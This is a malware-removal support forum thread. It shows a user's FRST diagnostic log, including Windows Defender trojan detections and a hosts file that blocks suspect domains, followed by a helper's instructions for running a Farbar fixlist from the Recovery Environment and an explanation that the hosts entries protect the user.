2019-02-15 00:30 - 2019-01-24 11:09 - 002714000 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2019-02-15 00:15 - 2019-02-13 06:14 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\libglesv2.dll
2019-02-15 00:15 - 2019-02-13 06:14 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\libegl.dll
2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2019-02-14 02:43 - 2019-02-08 19:51 - 002400096 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll
2019-02-14 02:42 - 2019-02-08 19:51 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node
2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2018-05-16 02:59 - 2018-05-16 02:59 - 000076088 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 002901504 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 000015360 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2019-02-14 02:42 - 2019-02-08 19:51 - 000405056 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\Release\spellchecker.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000138816 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node
2019-02-14 02:42 - 2019-02-08 19:52 - 003257192 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\Processing.NDI.Lib.x86.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\38318503.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\38318503.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Stanley\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img4.jpg
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TenorshareWinAdService => 2
MSCONFIG\Services: WsAppService => 2
MSCONFIG\startupreg: utweb => "C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "utweb"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "IncrediMail"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "RIMDeviceManager"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "QTWQA7PTCRBGCEE"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{27AB2084-96CC-423D-8AE7-D0AC93666081}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{3AF93F33-8A51-4215-BC5E-F4DB7A8EEE52}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{50B50355-5350-4725-BD33-5A7C6482C01A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E18A37C3-3221-4F6B-9241-67BE79FCF0DC}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{07B5D44D-4E10-43B2-9078-1C393459622F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File
FirewallRules: [{667D3D91-E5EA-4EA3-9A3C-5C2F77E71A0D}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File
FirewallRules: [{0CF852DE-F4B5-441D-95F8-130531A3076F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File
FirewallRules: [{0513F420-E8DE-4C74-BAF0-F3CFF66CE5C6}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File
FirewallRules: [{6DDFF7C5-16FF-49FF-95F9-472442614287}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{255BD4B5-55AB-4A04-AF01-2ECA95F1F335}] => (Allow) C:\Program Files\Opera\58.0.3135.65\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [TCP Query User{DD2AF73D-267B-418A-A0F5-05DD5ED97831}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{A7B50CA7-7E26-4E38-BC39-4332936FB3E2}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)

==================== Restore Points =========================

30-01-2019 08:42:13 Scheduled Checkpoint
07-02-2019 07:32:46 Scheduled Checkpoint
14-02-2019 03:01:16 Removed IncrediMail.
14-02-2019 23:59:09 Restore Point Created by FRST
16-02-2019 07:50:46 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/18/2019 01:22:23 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7875

Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7875

Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7875

Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7875

Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (02/17/2019 01:43:01 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 3953


System errors:
=============
Error: (02/17/2019 01:14:02 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: The system detected an address conflict for IP address 0.0.0.0 with the system
having network hardware address 00-00-00-00-00-00. Network operations on this system may
be disrupted as a result.

Error: (02/16/2019 09:01:30 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 09:00:39 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.

Error: (02/16/2019 09:00:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UC Browser Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (02/16/2019 08:33:34 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 08:32:43 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.

Error: (02/16/2019 08:32:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UC Browser Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (02/16/2019 07:38:07 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.


Windows Defender:
===================================
Date: 2019-02-15 01:30:44.644
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {33A0CEFD-234D-475F-8ADE-5D3D11D9E85A}
Scan Type: Antimalware
Scan Parameters: Full Scan

Date: 2019-02-14 03:37:29.427
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {37ABE826-5D4C-4627-8D24-955304B7A07C}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Name: Trojan:Win32/Fuerboos.C!cl
ID: 2147723654
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\AppData\Local\Dingbam.tst
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bitrep.A&threatid=2147723097&enterprise=0
Name: Trojan:Win32/Bitrep.A
ID: 2147723097
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\AppData\Local\IM\Identities\{A156883C-4811-474F-ACCE-796599B8B822}\Message Store\Messages\4\{E94F6B5A-2129-4595-A27B-FBAABD7D5EE2}\Attachments\Order_009.pdf
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:Win32/Prepscram&threatid=226289&enterprise=0
Name: SoftwareBundler:Win32/Prepscram
ID: 226289
Severity: High
Category: Software Bundler
Path: containerfile:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt;file:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt->setup.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 16:10:19.791
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80070424
Error description: The specified service does not exist as an installed service. 

Date: 2019-02-13 16:02:00.333
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80072ee2
Error description: The operation timed out 

Date: 2019-02-13 16:02:00.333
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80072ee2
Error description: The operation timed out 

Date: 2019-02-13 15:59:52.285
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80070424
Error description: The specified service does not exist as an installed service. 

Date: 2018-05-29 09:02:21.940
Description: 
Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0
Name: PWS:Win32/Dyzap.X
ID: 2147717189
Severity: Severe
Category: Password Stealer
Path: process:_pid:5952,ProcessStart:131720254146746317
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\APPROVED_DOCUMENTS_2018_PDF\APPROVED DOCUMENTS 2018_PDF.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

CodeIntegrity:
===================================

Date: 2018-12-23 07:19:51.102
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:49.365
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:47.582
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:45.686
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 71%
Total physical RAM: 4006.35 MB
Available physical RAM: 1129.15 MB
Total Virtual: 7974.35 MB
Available Virtual: 4140.02 MB

==================== Drives ================================

Drive 😄 () (Fixed) (Total:297.75 GB) (Free:65.53 GB) NTFS

\\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Link to post
Share on other sites

AND PLEASE SIR, I'M WORRIED ABOUT THIS FROM THE ADDITION.TXT

 

 

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com

 

WHAT DOES IT MEAN?????

Link to post
Share on other sites


Hi,

Please follow these instructions carefully. If possible print it will help you follow the directives.

Please download the attached Fixlist.txt file to  the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the FRST.txt log you have submitted.

===

When done continue.

I was informed by an expert that you will need to run this fix in the Recovery Environment to completely remove the infection.

Boot in the Recovery Environment WINDOWS 8, 8.1 USERS

To enter the Recovery Environment with Windows 8 or Windows 8.1, follow the instructions in this tutorial on EightForums
https://www.eightforums.com/tutorials/4935-startup-options-menu-boot-windows-8-a.html

Once in the Windows RE, go to the Command Prompt See the image.

at the prompt type
cd C:\Users\Stanley\Downloads\FRST  press the enter key.

You should see the FRST .exe and the Fixlist.txt files.

type frst.exe, or  (for the x64 version, type frst64.exe and press on Enter

FRST will open
Click on Yes to accept the disclaimer <- if required.
Click on the Scan button and wait for the scan to complete
A log called FRST.txt will be saved in the FRST folder.
Attach it in your next reply

If at any time you  need help please ask.

p.s.
To exit the Recovery Environment (RE) type Exit and press the enter key.

===

Quote

AND PLEASE SIR, I'M WORRIED ABOUT THIS FROM THE ADDITION.TXT

Your HOSTS file (no extension) is protecting you from going to the bad sites listed.

Read about it.
http://winhelp2002.mvps.org/hosts.htm
===

Please let me know what problems you are having with this computer.

fixlist.txt

Link to post
Share on other sites

  • Root Admin

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Thanks

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.